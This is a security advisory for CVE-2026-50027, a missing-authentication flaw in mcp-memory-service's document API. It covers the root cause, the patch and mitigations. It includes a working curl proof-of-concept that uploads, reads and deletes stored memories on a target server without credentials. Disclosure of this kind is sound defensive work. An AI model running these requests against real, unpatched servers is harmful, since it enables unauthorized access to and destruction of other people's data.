critical · 9.8CVE-2026-50027Jul 2, 2026

CVE-2026-50027: mcp-memory-service Missing Authentication on Document API Endpoints

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

All seven file/document endpoints in mcp-memory-service accepted requests without any credentials, letting anyone on the network read, write, or delete stored AI memories even when API-key or OAuth au

Packagemcp-memory-service
Ecosystempip
Affected< 10.67.1
Fixed in10.67.1

The problem

The FastAPI router in `documents.py` was instantiated as `router = APIRouter()` with no `dependencies=` argument, and the file never imported `Depends`. This meant every route under `/api/documents/*` (upload, batch-upload, status, history, remove, remove-by-tags, search-content) ran with no authentication check at all.

The sibling `memories.py` router correctly used `Depends(require_write_access)` on equivalent routes, so the authentication infrastructure existed and worked. The omission in `documents.py` created an inconsistent boundary that bypassed the entire auth layer. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Proof of concept

A working proof-of-concept for CVE-2026-50027 in mcp-memory-service, with the exact payload below.

bash
# Step 1: confirm auth IS enforced on /api/memories (expect 401)
curl -i http://TARGET:8000/api/memories
# HTTP/1.1 401 Unauthorized

# Step 2: write arbitrary content into the memory store -- no credentials
printf 'attacker-controlled content' > /tmp/poc.txt
UPLOAD_ID=$(
  curl -s -X POST http://TARGET:8000/api/documents/upload \
    -F "file=@/tmp/poc.txt" -F "tags=poc-tag" |
  python3 -c 'import sys,json; print(json.load(sys.stdin)["upload_id"])'
)
# HTTP/1.1 200 OK  {"upload_id": "<uuid>"}

# Step 3: read stored document content -- no credentials
curl -s "http://TARGET:8000/api/documents/search-content/$UPLOAD_ID"
# HTTP/1.1 200 OK  (returns full document content)

# Step 4: delete all memories matching a tag -- no credentials
curl -i -X DELETE "http://TARGET:8000/api/documents/remove-by-tags" \
  -H "Content-Type: application/json" \
  -d '["poc-tag"]'
# HTTP/1.1 200 OK  {"memories_deleted": 1}

The root cause is CWE-306 (Missing Authentication for Critical Function). `documents.py` never imported `Depends` from FastAPI and instantiated its router without a `dependencies=` parameter, so FastAPI had no hook to invoke any auth middleware on any of the seven routes.

Patch commit 907bac72 (shipped in 10.67.1) added `Depends(require_write_access)` as a parameter to write routes (upload, batch-upload, remove, remove-by-tags) and `Depends(require_read_access)` to read routes (status, history, search-content). Because FastAPI resolves dependency injection at route registration time, adding the `Depends(...)` argument to each function signature is sufficient to enforce the existing auth logic that was already protecting `memories.py`.

The fix

Upgrade to mcp-memory-service 10.67.1 or later. The patch (commit 907bac72) adds `Depends(require_write_access)` or `Depends(require_read_access)` to every function signature in `documents.py`, bringing all seven `/api/documents/*` endpoints under the same authentication enforcement already present on `/api/memories/*`.

If you cannot upgrade immediately, remove network exposure of the HTTP server (bind to 127.0.0.1 only, or place behind an authenticating reverse proxy) until you can apply the patch.

Reporter not attributed.

References: [1][2]

Related research